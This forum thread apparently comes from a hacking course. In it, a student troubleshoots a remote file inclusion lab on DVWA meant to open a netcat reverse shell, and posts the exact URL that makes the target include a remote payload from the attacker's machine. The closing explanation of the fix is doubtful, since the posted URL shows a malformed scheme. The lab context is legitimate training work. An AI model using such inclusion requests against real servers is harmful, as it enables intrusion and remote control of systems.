- April 30, 2020 at 11:09 pm #35452
When I execute the URL to establish the reverse connection, no connection is made by netcat. DVWA is set to “low. I receive these two messages right below the URL bar:
“Warning: include(http:/10.0.2.6/reverse.txt) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35.
Warning: include() [function.include]: Failed opening ‘http:/10.0.2.6/reverse.txt’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear:../../external/phpids/0.6/lib/’) in /var/www/dvwa/vulnerabilities/fi/index.php on line 35”.
This is similar to errors I got with local file inclusion.
Both Kali and Metasploitable are set to NatNetwork; Kali apache2 server is running. Phpini file edited to allow_url On. Thanks is advance.May 1, 2020 at 9:03 am #35492Vashisht BoodhunModerator
Can you paste the exact url used there?May 2, 2020 at 12:49 am #35576
This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt
kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.May 2, 2020 at 12:31 pm #35601Vashisht BoodhunModerator
Can you try clearing the browsing history for the kali machine?May 2, 2020 at 9:59 pm #35638
That didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,
TomMay 3, 2020 at 3:54 pm #35708Zaid SabihModerator
Perfect, glad you figured it out 🙂
- You must be logged in to reply to this topic.